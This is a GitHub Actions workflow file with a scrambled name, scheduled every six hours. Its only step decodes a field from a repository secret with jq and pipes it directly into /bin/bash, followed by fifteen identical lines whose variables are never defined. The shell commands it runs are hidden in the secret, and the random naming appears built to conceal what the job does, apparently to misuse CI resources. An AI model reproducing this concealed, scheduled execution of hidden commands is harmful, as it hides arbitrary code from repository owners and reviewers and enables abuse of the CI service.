name: hongqizhngne

on:
  workflow_dispatch:
  schedule:
    - cron: '47 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hongqizhngne
        env:
          qz45: ${{ secrets.qz45 }}
        run: |
          echo $qz45 | jq -r .fwr44627 | /bin/bash
          echo $vxy6 | jq -r .d7 | /bin/bash
          echo $f2 | jq -r .qrbf9 | /bin/bash
          echo $wl155 | jq -r .clz5 | /bin/bash
          echo $nupnq484 | jq -r .erli1 | /bin/bash
          echo $gtli531 | jq -r .mchgq86821 | /bin/bash
          echo $qgiv35496 | jq -r .qelm2 | /bin/bash
          echo $jslu21139 | jq -r .cxupi5 | /bin/bash
          echo $d5 | jq -r .lhsw1 | /bin/bash
          echo $ntzwc81885 | jq -r .dm6 | /bin/bash
          echo $lei23792 | jq -r .yyxro69793 | /bin/bash
          echo $y9 | jq -r .b4 | /bin/bash
          echo $tmw79 | jq -r .fox645 | /bin/bash
          echo $wnpu7 | jq -r .r4 | /bin/bash
          echo $j13350 | jq -r .umzcz7 | /bin/bash
          echo $eiteh3078 | jq -r .orlga14 | /bin/bash

